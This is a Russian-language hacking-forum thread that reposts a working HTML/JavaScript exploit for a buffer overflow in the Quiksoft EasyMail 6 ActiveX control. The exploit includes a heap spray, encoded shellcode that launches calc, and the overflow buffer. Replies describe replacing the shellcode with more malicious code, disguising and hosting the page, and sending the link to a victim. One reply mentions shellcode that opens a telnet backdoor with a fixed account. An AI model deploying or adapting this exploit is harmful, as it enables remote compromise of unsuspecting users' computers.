Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit (https://forum.antichat.xyz/showthread.php?t=157353)

cheater_man 17.11.2009 20:44

Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
 
<html>
<head>
<!--
-- Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
--
-- Its old and the latest version doesn't support this method.
-- I was bored and a similar post sparked my interest.
--
-- Advisory: http://www.bmgsec.com.au/advisory/48/
--
-- Written by:
-- bmgsec (bmgsec [at] gmail.com / www.bmgsec.com.au)
-- -->
<title>Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit</title>
<object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='test'></object>
<script language='javascript'>
function str_repeat ( input, multiplier ) {
return new Array(multiplier+1).join(input);
}

//windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikata_ga_nai ExitFunc: SEH
shellcode = unescape("%uc931%u1eb1%ue2b8%udc1f%ud9cc%ud9e5%u24 74%u5bf4%u4331%u830f%ufceb"+
"%u4303%ufde9%u3029%u4505%uc9d2%ucdd5%uf597%uad5e% u7e12%ua161%u3196"+
"%ub679%uedf6%u2378%u6541%u384e%u9753%ufe9f%ucbcd% u3e5b%u1499%u75a2"+
"%u1a6f%u61e6%u2784%u51b2%u2d61%u11df%ue936%ucd1e% u7aaf%u5a2c%u22bb"+
"%u5d30%u5750%ud654%u83a7%ub4ed%u5783%u1b2e%ua1fd% uf2d0%uc699%ucb56"+
"%u99ea%ua05a%u059d%u3dcf%u3e35%uba86%ufe45%u6af2% u0f22%u8f88%u87ed"+
"%u7114%u569b%u7173%u057b%ue11a%ucae7");

bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize + shellcode.length;

while (bigblock.length < slackspace)
bigblock += bigblock;

fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);

while (block.length + slackspace < 200000)
block = block + block + fillblock;

memory = new Array();
for (i=0; i<500; i++)
memory[i] = block + shellcode;

buffer = str_repeat('A', 433);
buffer += "BBBB";
buffer += str_repeat(unescape("%0b%0b%0b%0b"), 63);

test.AddAttachment(buffer, 1);
</script>
</head>
</html>
Как работает обьясните please :) :)

Nik(rus) 17.11.2009 21:56

1) Спасибо всемогущему милвурму :)
2)shellcode = unescape("shellcode here"); - вместо shellcode here вставляешь шеллкод, маскирушь сплойт, хостишь, проверяешь - если работает, все ок, если нет, то попробуй качнуть более дырявую Quiksoft EasyMail 6 :), ну а затем давай ссылочку жертве

cheater_man 17.11.2009 22:07

Цитата:

Сообщение от Nik(rus)
1) Спасибо всемогущему милвурму :)
2)shellcode = unescape("shellcode here"); - вместо shellcode here вставляешь шеллкод, маскирушь сплойт, хостишь, проверяешь - если работает, все ок, если нет, то попробуй качнуть более дырявую Quiksoft EasyMail 6 :), ну а затем давай ссылочку жертве

C помощью этого сплоита я могу получить cmd удаленной машины?

Nik(rus) 18.11.2009 19:48

Смотря какой шеллкод, здесь явно виден шелкод запуска Калькулятора (великого и ужасного нах), но если туда вставить более злонамерный код... то там можно даже кое-что покруче консоли заполучить

cheater_man 19.11.2009 19:56

Цитата:

Сообщение от Nik(rus)
Смотря какой шеллкод, здесь явно виден шелкод запуска Калькулятора (великого и ужасного нах), но если туда вставить более злонамерный код... то там можно даже кое-что покруче консоли заполучить

Где именно ты видишь код calc.exe?
И какой код у cmd?

Nik(rus) 19.11.2009 21:01

Тут шелкоды
А calc.exe... ну комменты прочитал :D

paste 19.11.2009 21:15

//windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikata_ga_nai ExitFunc: SEH

cheater_man 20.11.2009 14:29

тоесть вместо вот этого:
shellcode = unescape("%uc931%u1eb1%ue2b8%udc1f%ud9cc%ud9e5%u24 74%u5bf4%u 4331%u830f%ufceb"+
"%u4303%ufde9%u3029%u4505%uc9d2%ucdd5%uf597%uad5e% u 7e12%ua161%u3196"+
"%ub679%uedf6%u2378%u6541%u384e%u9753%ufe9f%ucbcd% u 3e5b%u1499%u75a2"+
"%u1a6f%u61e6%u2784%u51b2%u2d61%u11df%ue936%ucd1e% u 7aaf%u5a2c%u22bb"+
"%u5d30%u5750%ud654%u83a7%ub4ed%u5783%u1b2e%ua1fd% u f2d0%uc699%ucb56"+
"%u99ea%ua05a%u059d%u3dcf%u3e35%uba86%ufe45%u6af2% u 0f22%u8f88%u87ed"+
"%u7114%u569b%u7173%u057b%ue11a%ucae7");
Иду на milworm и там смотрю шеллы?

Kerny 28.11.2009 22:47

шеллкод поднимающий службу телнет, на 467 порту (при условии, что на компе винда, причем русская)
user: kerny2
pass: paswd

Осталось, только в машинный эквивалент перевести, что не сложно.

cheater_man 29.11.2009 02:14

Цитата:

Сообщение от Kerny
шеллкод поднимающий службу телнет, на 467 порту (при условии, что на компе винда, причем русская)
user: kerny2
pass: paswd

Осталось, только в машинный эквивалент перевести, что не сложно.

Хм.... и как же перевести в машинный эквивалент?


Время: 19:50